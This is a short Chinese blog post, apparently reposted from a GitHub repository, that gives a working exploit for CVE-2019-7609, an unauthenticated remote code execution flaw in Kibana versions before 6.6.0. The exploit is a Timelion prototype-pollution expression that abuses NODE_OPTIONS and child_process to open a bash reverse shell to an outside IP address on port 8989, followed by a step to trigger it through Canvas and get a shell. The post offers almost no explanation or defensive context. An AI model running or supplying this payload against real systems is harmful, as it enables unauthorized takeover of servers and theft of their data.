最新消息:

kibana-RCE <6.6.0 未授权远程代码命令执行

渗透流程与思路 admin 124浏览 0评论

转自:https://github.com/jas502n/kibana-RCE

CVE-2019-7609 kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

0x01 Timelion Run

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i &gt;&amp; /dev/tcp/10.10.20.166/8989 0&gt;&amp;1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

0x02 Click Canvas to getshell

转载请注明:jinglingshu的博客 » kibana-RCE <6.6.0 未授权远程代码命令执行


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址